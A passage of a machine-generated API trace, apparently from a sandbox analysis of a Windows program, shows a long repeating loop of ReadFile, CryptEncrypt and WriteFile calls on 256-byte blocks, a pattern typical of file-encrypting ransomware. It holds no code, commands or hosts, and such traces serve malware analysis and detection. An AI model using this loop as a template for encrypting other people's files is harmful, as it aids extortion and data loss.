lpOverlapped=0x0) returned 1 [0167.756] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.756] GetLastError () returned 0x0 [0167.756] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.756] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.756] GetLastError () returned 0x0 [0167.756] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.756] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.756] GetLastError () returned 0x0 [0167.756] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.756] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.756] GetLastError () returned 0x0 [0167.756] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.756] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.756] GetLastError () returned 0x0 [0167.756] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.756] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.756] GetLastError () returned 0x0 [0167.756] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.757] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.758] GetLastError () returned 0x0 [0167.758] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.758] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.758] GetLastError () returned 0x0 [0167.758] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.758] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.758] GetLastError () returned 0x0 [0167.758] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.758] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.758] GetLastError () returned 0x0 [0167.758] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.758] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.759] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.759] GetLastError () returned 0x0 [0167.759] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.759] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.759] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.759] GetLastError () returned 0x0 [0167.759] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.759] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.759] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.759] GetLastError () returned 0x0 [0167.759] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.759] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.759] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.759] GetLastError () returned 0x0 [0167.759] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.759] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.759] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.759] GetLastError () returned 0x0 [0167.759] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.759] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.759] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.759] GetLastError () returned 0x0 [0167.759] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.759] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.760] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.760] GetLastError () returned 0x0 [0167.760] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.760] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.760] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.760] GetLastError () returned 0x0 [0167.760] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.760] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.760] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.760] GetLastError () returned 0x0 [0167.760] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.760] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.760] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.760] GetLastError () returned 0x0 [0167.760] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.760] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.760] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.760] GetLastError () returned 0x0 [0167.760] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.760] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.760] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.760] GetLastError () returned 0x0 [0167.760] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.760] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.760] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.760] GetLastError () returned 0x0 [0167.761] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.761] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.761] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.761] GetLastError () returned 0x0 [0167.761] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.761] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.761] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.761] GetLastError () returned 0x0 [0167.761] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.761] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.761] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.761] GetLastError () returned 0x0 [0167.761] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.761] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.761] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.761] GetLastError () returned 0x0 [0167.761] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.761] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.761] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.761] GetLastError () returned 0x0 [0167.761] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.761] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.761] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.761] GetLastError () returned 0x0 [0167.761] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.762] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.762] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.762] GetLastError () returned 0x0 [0167.762] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.762] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.762] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.762] GetLastError () returned 0x0 [0167.762] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.762] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.762] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.762] GetLastError () returned 0x0 [0167.762] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.762] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, 